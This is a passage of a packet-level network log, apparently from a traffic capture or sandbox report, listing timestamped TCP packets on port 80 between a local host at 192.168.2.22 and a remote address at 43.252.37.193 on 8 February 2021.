Feb 8, 2021 10:28:21.931794882 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.931819916 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:21.931829929 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.134295940 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.134593010 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.136394978 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.136437893 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.136475086 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.136518955 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.136522055 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.136544943 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.136581898 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.341140032 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.341202974 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.341252089 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.341295004 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.341334105 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.341372967 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.341535091 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.344937086 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.546144009 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.546219110 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.546255112 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.546266079 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.546302080 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.546308041 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.546308994 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.546367884 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.549482107 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.549532890 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.549578905 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.549612045 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.753197908 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.753249884 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.753290892 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.753329992 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.753448009 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.756341934 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.756392956 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.756444931 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.756483078 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.756489038 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.756597996 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.756663084 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.959336996 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.959383965 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.959649086 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.961519957 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.961570978 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.961622000 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.961657047 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.961746931 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.961786985 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:22.961827993 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:22.961855888 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.164124012 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.164191961 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.164310932 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.164340973 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.166009903 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.166063070 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.166095018 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.166134119 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.166167021 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.166217089 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.166234016 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.166280031 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.368864059 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.368926048 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.369175911 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.370393038 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.370448112 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.370522022 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.370553970 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.370573044 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.370623112 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.370652914 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.370682001 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.573863029 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.573914051 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.574086905 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.574798107 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.574850082 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.574898005 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.574918985 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.575021982 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.575063944 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.575102091 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.575119972 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.781049967 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.781099081 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.781137943 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.781177998 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.781357050 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.781411886 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.781764984 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.781873941 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.782016993 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.782067060 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.782109976 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.782135963 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.988363981 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.988420010 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.988460064 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.988498926 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.988548040 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.988641977 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.988653898 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.988677979 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.988697052 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:23.988718033 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:23.988749981 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.193187952 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.193244934 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.193284988 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.193288088 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.193320990 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.193325043 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.193366051 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.193367958 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.193383932 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.193420887 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.193430901 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.193470001 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.193495989 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.193546057 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.397840977 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.397869110 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.397881031 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.397893906 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.397953033 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.397998095 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.398226023 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.398283005 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.401088953 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.602725029 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.603085041 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.605293036 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.605314970 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.605329990 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.605346918 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.605362892 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.605379105 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.605511904 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.605555058 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.807559967 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.807676077 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.810086012 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.810110092 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.810184956 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.810209990 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.813328981 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.813366890 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.813414097 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.813431978 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:24.813469887 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.813519001 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.813532114 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:24.813538074 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.014410973 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.014437914 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.014455080 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.014722109 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.014772892 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.014780998 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.017709970 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.017925978 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.018007994 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.018057108 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.223056078 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.223078966 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.223090887 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.223345041 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.224514008 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.224535942 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.224682093 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.427731991 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.427767992 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.427793026 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.427814960 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.427891016 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.428756952 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.428793907 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.428818941 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.428845882 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.428852081 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.633944035 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.634222031 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.634990931 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.635020018 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.635087013 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.635104895 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.839170933 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.839201927 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.839224100 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.839339018 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:25.839400053 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.839461088 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.839466095 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:25.839468002 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.043896914 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.043920040 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.043931961 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.043942928 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.044162035 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.045250893 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.045269012 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.248832941 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.249152899 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.249656916 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.249687910 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.249703884 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.249754906 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.249783993 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.253278017 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.454406977 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.454457045 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.454518080 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.454557896 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.454611063 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.454623938 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.459018946 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.459116936 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.655468941 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.655745029 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.660315037 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.660345078 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.660535097 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.861362934 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.861687899 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:26.866123915 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.866169930 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:26.866476059 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.066237926 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.066284895 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.066346884 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.067332029 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.070943117 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.071000099 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.071043015 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.071072102 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.271508932 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.271629095 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.271832943 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.271888971 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.275696039 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.275768995 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.275871992 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.275918007 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.476301908 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.476356983 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.476578951 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.480185986 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.480230093 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.480408907 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.681521893 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.681792021 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.681874990 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.681967974 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.684945107 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.685015917 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.685080051 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.685112953 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.886195898 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.886255980 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.886415958 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.889501095 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.889559984 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:27.889664888 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:27.889699936 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.090977907 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.091048002 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.091110945 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.091151953 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.091278076 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.091315031 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.094352007 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.094398022 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.094578981 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.296118975 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.296149015 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.296174049 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.296197891 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.296407938 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.298966885 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.298990011 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.299108028 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.503935099 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.503994942 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.504034996 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.504070997 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.504128933 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.505243063 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.505287886 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.505296946 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.505327940 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.505361080 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.708678961 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.708714962 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.709434032 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.709456921 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.709673882 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.709738016 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.711452961 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.711520910 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.711529016 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.711536884 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.711544037 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.915923119 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.916088104 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.916125059 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.916145086 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.916214943 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.916224957 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.916276932 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.916277885 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.916285038 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.916322947 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.916342974 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.916371107 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.916394949 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.916429996 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:28.916475058 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:28.916493893 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.120992899 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.121026993 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.121056080 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.121089935 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.121128082 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.121179104 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.121211052 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.121318102 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.121371984 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.326150894 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.326210022 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.326252937 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.326291084 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.326328039 CET	80	49167	43.252.37.193	192.168.2.22
Feb 8, 2021 10:28:29.326354027 CET	49167	80	192.168.2.22	43.252.37.193
Feb 8, 2021 10:28:29.326366901 CET	80	49167	43.252.37.193	192.168.2.22
